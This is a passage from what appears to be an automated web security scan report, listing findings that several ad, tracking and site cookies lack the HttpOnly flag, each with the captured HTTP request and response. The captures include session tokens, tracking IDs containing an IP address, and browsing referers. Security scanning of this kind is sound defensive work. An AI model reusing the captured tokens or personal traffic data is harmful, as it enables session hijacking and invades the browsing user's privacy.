Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=a77f7cc039e4141166222dd; expires=Tue, 04-Sep-2012 02:31:20 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.deleted_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:31:20 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.1_354.0_785354.0_63.deleted_78563.deleted; expires=Tue, 04-Sep-2012 02:31:20 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.1_354.0_785354.0_63.deleted_78563.deleted; path=/; domain=.lijit.com

var MAX_0516a14c = '';
MAX_0516a14c += "%3Cscript%20language%3D%22JavaScript%22%3Eif%20(typeof%20LJT_bC%20%3D%3D%20%22undefined%22)%20%7B%20LJT_bC%20%3D%20new%20Array()%3B%20%20%7D%20LJT_bC%5B128348%5
...[SNIP]...

11.32. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1315189890173&ns_c=UTF-8&c8=&c7=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-3440800076797949%26output%3Dhtml%26h%3D90%26slotname%3D5330033957%26w%3D728%26ea%3D0%26flash%3D10.3.183%26url%3Dhttp%253A%252F%252Fwww.w3schools.com%252Fjs%252Ftryit.asp%253Ffilename%253Dtryjs_text%26dt%3D1315189888080%26bpp%3D10%26shv%3Dr20110824%26jsv%3Dr20110719%26correlator%3D1315189888119%26frm%3D7%26adk%3D716720423%26ga_vid%3D1478965365.1315189423%26ga_sid%3D1315189423%26ga_hid%3D817954302%26ga_fc%3D1%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D20%26u_nmime%3D100%26dff%3Dverdana%26dfs%3D12%26biw%3D1266%26bih%3D910%26ifk%3D790186330%26fu%3D4%26ifi%3D3%26dtd%3D51&c9= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 05 Sep 2011 02:30:53 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 04-Sep-2013 02:30:53 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.33. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=8500755&c3=3720565304d55bd8eb4bad&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 16:17:16 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 16:17:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.34. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035148&d.c=gif&d.o=djglobal&d.x=165506085&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424053111904900904576549933849920392.html%3Fmod%3Dgooglenews_wsj&d.r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fie%3DUTF-8%26q%3DHoulihan%2BLokey%26sourceid%3Dchrome HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 16:17:42 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 16:17:42 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.35. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=2&3pid=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898879098e79e1e7e81d&rand=1315189887909&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_text&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:53 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n55 ( lax-agg-n31), ms lax-agg-n31 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Tue, 06 Sep 2011 02:30:44 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; expires=Tue, 04-Sep-2012 02:30:44 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

11.36. http://community.skype.com/t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cookie: mbox=session#1314116641836-449310#1314120755|PC#1314116641836-449310.19#1316710895|check#true#1314118955; s_nr=1314120062684-New; __utma=242698589.1857710967.1314116648.1314116648.1314116648.1; __utmz=242698589.1314116648.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2729EA07851D0931-6000010C20019DC8[CE]; SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; LiSESSIONID=1F5F55A104B15E98305CB8453A5AA234; VISITORID=76516592

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 04 Sep 2011 22:42:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: LiSESSIONID=1F5F55A104B15E98305CB8453A5AA234; Path=/; HttpOnly
Set-Cookie: VISITORID=76516592; Domain=.skype.com; Expires=Thu, 04-Sep-2014 16:09:14 GMT; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.skype.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
location: /t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
Content-Length: 0
Connection: close
Content-Type: text/plain


11.37. http://community.skype.com/t5/English/ct-p/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/English/ct-p/English

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/English/ct-p/English?profile.language=en HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: community.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1344388383; Domain=.skype.com; Expires=Thu, 04-Sep-2014 14:36:06 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 174723
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

11.38. http://community.skype.com/t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36?v=mpbl-1 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B; Path=/; HttpOnly
Set-Cookie: VISITORID=1344388383; Domain=.skype.com; Expires=Thu, 04-Sep-2014 14:36:06 GMT; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.skype.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Wed, 29 Jun 2011 09:10:42 GMT
Expires: Mon, 03 Sep 2012 21:09:48 GMT
Content-Length: 934
Connection: close
Content-Type: image/jpeg;charset=UTF-8

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......$...."..............................
...[SNIP]...

11.39. http://content.dell.com/us/en/business/security-network.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.dell.com
Path:   /us/en/business/security-network.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673 HTTP/1.1
Host: content.dell.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Awesomed-By: Thundera RE-TP.JR.NC
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: stop_mobi=; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: stop_mobi=; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: dus=ci=security-network&th=sb360; path=/
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:07 GMT
Content-Length: 53254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xm
...[SNIP]...

11.40. http://cymphonix.app3.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cymphonix.app3.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: cymphonix.app3.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 497
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=9wx8yO-JzQEkAAAAZDlmMTg2YTAtZDZhNS00N2EyLTk0M2MtNDgyZmQ3MjRmMDc40; expires=Mon, 03-Sep-2012 16:18:41 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=26d75963-767c-4ca2-894f-e053f209e8bf; domain=cymphonix.app3.hubspot.com; expires=Sat, 04-Sep-2021 05:00:00 GMT; path=/; HttpOnly
Date: Sun, 04 Sep 2011 16:18:41 GMT
Set-Cookie: HUBSPOT159=152114348.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 42078;
var hsWeekEndsIn = 42078;
var hsMonthEndsIn = 2288478;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-04 12:18:
...[SNIP]...

11.41. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898879098e79e1e7e81d&rand=1315189887909&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_text&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Sat, 03-Mar-2012 02:30:53 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Sep 2011 02:30:52 GMT

GIF89a.............!.......,...........D..;

11.42. http://data.cmcore.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?tid=17&ci=90379962&vn1=4.1.1&vn2=imp&ec=UTF-8&cm_mmc=Wall%20Street%20Journal%20US%20%28WSJ%29-_-2011%20Frost%20Online-_-Business%20Package-_-fro11157_phase2_savings_300x600_v1 HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/newscolumns_businessstory;u=**300x250,336x280,300x600,336x850******223,234,220,231,233,227**;page=article;msrc=googlenews_wsj;p39=223;p39=234;p39=220;p39=231;p39=233;p39=227;;mc=google_fullfree;tile=5;sz=300x250,336x280,300x600,336x850;ord=9507950795079507;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:44 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90379962_reset=1315153064;path=/
Expires: Sat, 03 Sep 2011 22:17:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

11.43. http://dce.sapha.com/logging.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /logging.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logging.php?ac=2522&NS_sw=1920&NS_sh=1200&NS_sc=16&NS_c=yes&NS_pn=&NS_vpn=&NS_uuid=&NS_pt=Bandwidth%20Shaping%20and%20Control%20Demo&NS_ru=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan+Lokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf+web+application+security%26pbx%3D1%26oq%3Dwaf+web+application+security%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&NS_rn=23696&NS_js=1.6&NS_vp=http%3A//www.cymphonix.com/2011-shaping-demo-sem.html%3Futm_campaign%3D2011-Q1-Web-AdWords%26utm_source%3DAdWords%26utm_content%3D7-Minute-Demo%26gclid%3DCPr6tJD_g6sCFQo0QgodKw5i0g&NS_tz=300&NS_la=&NS_tid=&NS_tamt=&NS_cid= HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2522=TRUE

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:19:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'
Cache-Control: private
Set-Cookie: sapha_2522_1=1038377%7C214589%7C149788%7C2011-09-04+10%3A19%3A28; expires=Wed, 01-Sep-2021 16:19:28 GMT; path=/; domain=.sapha.com
Location: http://dce.sapha.com/0.gif
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


11.44. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

